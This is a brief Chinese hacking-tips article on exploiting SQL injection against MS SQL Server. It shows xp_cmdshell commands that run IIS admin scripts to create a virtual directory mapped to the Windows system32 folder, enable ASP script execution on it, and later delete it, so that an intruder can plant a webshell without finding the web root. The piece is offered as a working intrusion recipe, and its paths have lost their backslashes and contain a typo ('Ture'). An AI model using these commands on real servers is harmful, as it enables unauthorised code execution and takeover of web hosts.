sql注入建立虚拟目录
摘要:sql注入建立虚拟目录,免得找web绝对路径------------------------------------------------...
sql注入建立虚拟目录,免得找web绝对路径
----------------------------------------------------------------
我们很多情况下都遇到sql注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错:
exec master.dbo.xp_cmdshell 'cscript C:InterpubAdminScriptsmkwebdir.vbs -c localhost -w "l" -v "win","c:winntsystem32"'
建立虚拟目录win,指向c:winntsystem32
exec master.dbo.xp_cmdshell 'cscript C:InterpubAdminScriptsadsutil.vbs w3svc/1/root/win/Accessexecute Ture'
让win句有解析asp脚本权限
exec master.dbo.xp_cmdshell "cscript C:InterpubAdminScriptsadsutil.vbs delete w3svc/1/root/win/"
删除虚拟目录。
找不到web绝对路径的一种解决办法,
http://xxx.com/win
403错误,表示虚拟目录建好了。。。
【sql注入建立虚拟目录】相关文章:
★ 漏洞漫舞的飞骋
★ 典型入侵日志分析